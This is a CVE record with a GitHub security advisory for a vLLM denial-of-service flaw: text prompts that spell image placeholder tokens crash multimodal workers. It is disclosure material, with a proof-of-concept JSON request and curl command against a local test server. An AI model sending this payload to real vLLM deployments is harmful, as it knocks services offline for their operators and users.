vLLM is an inference and serving engine for large language models (LLMs). From 0.6.1 to before 0.20.0, there is a a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. This vulnerability is fixed in 0.20.0.
vLLM: Remote DoS via Special-Token Placeholders
Problem type
Affected products
vllm-project
>= 0.6.1, < 0.20.0 - AFFECTED
References
https://github.com/vllm-project/vllm/security/advisories/GHSA-hpv8-x276-m59f
https://github.com/vllm-project/vllm/issues/32656
GitHub Security Advisories
GHSA-hpv8-x276-m59f
vLLM Vulnerable to Remote DoS via Special-Token Placeholders
https://github.com/advisories/GHSA-hpv8-x276-m59fSummary
This report explains a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL.
Details
- Affected component: multimodal input position computation.
- File/functions (paths are indicative):
- vllm/model_executor/layers/rotary_embedding.py
- get_input_positions_tensor(...)
- _vl_get_input_positions_tensor(...)
- vllm/model_executor/layers/rotary_embedding.py
- Failure mechanism:
- The code counts detected vision tokens and then indexes video_grid_thw/image_grid_thw accordingly.
- When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. The code does not bounds-check before indexing.
Representative snippet (context):
# vllm/model_executor/layers/rotary_embedding.py
@classmethod
def _vl_get_input_positions_tensor(
cls,
input_tokens,
hf_config,
image_grid_thw,
video_grid_thw,
...,
):
# detect video tokens
video_nums = (vision_tokens == video_token_id).sum()
# later in processing
t, h, w = (
video_grid_thw[video_index][0], # IndexError if no video data
video_grid_thw[video_index][1],
video_grid_thw[video_index][2],
)
Abbreviated call path:
OpenAI API request
→ vllm.v1.engine.core: step/execute_model
→ vllm.v1.worker.gpu_model_runner: _update_states/execute_model
→ vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor
→ _vl_get_input_positions_tensor
→ IndexError: list index out of range
PoC
Environment
- vLLM: 0.10.0
- Model: Qwen/Qwen2.5-VL-3B-Instruct
- Launch server:
python -m vllm.entrypoints.openai.api_server \
--model Qwen/Qwen2.5-VL-3B-Instruct \
--port 8000
Request (text-only, no image/video data)
cat > request.json <<'JSON'
{
"model": "Qwen/Qwen2.5-VL-3B-Instruct",
"messages": [
{
"role": "user",
"content": [
{ "type": "text",
"text": "what's in picture <|vision_start|><|image_pad|><|vision_end|>" }
]
}
]
}
JSON
curl -s http://127.0.0.1:8000/v1/chat/completions \
-H 'Content-Type: application/json' \
--data @request.json
Observed result
- HTTP 500; logs show IndexError: list index out of range from _vl_get_input_positions_tensor(...).
- In some deployments, the worker exits and capacity remains reduced until manual restart.
Impact
- Type: Token Injection leading to Remote Denial of Service (unauthenticated). A single request can trigger the fault.
- Scope: Any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts).
- Effect: Request → unhandled exception in position computation → worker termination / service unavailability.
Fixes
- Changes associated with https://github.com/vllm-project/vllm/issues/32656
Credits
Pengyu Ding (Infra Security, Ant Group)
Ziteng Xu (Infra Security, Ant Group)
JSON source
https://cveawg.mitre.org/api/cve/CVE-2026-44222Click to expand
{
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"cveMetadata": {
"cveId": "CVE-2026-44222",
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"dateUpdated": "2026-05-12T19:57:25.336Z",
"dateReserved": "2026-05-05T15:42:40.518Z",
"datePublished": "2026-05-12T19:57:25.336Z",
"state": "PUBLISHED"
},
"containers": {
"cna": {
"providerMetadata": {
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M",
"dateUpdated": "2026-05-12T19:57:25.336Z"
},
"title": "vLLM: Remote DoS via Special-Token Placeholders",
"descriptions": [
{
"lang": "en",
"value": "vLLM is an inference and serving engine for large language models (LLMs). From 0.6.1 to before 0.20.0, there is a a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. This vulnerability is fixed in 0.20.0."
}
],
"affected": [
{
"vendor": "vllm-project",
"product": "vllm",
"versions": [
{
"version": ">= 0.6.1, < 0.20.0",
"status": "affected"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"lang": "en",
"description": "CWE-129: Improper Validation of Array Index",
"cweId": "CWE-129",
"type": "CWE"
}
]
}
],
"references": [
{
"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-hpv8-x276-m59f",
"name": "https://github.com/vllm-project/vllm/security/advisories/GHSA-hpv8-x276-m59f",
"tags": [
"x_refsource_CONFIRM"
]
},
{
"url": "https://github.com/vllm-project/vllm/issues/32656",
"name": "https://github.com/vllm-project/vllm/issues/32656",
"tags": [
"x_refsource_MISC"
]
}
],
"metrics": [
{
"cvssV3_1": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM"
}
}
]
}
}
}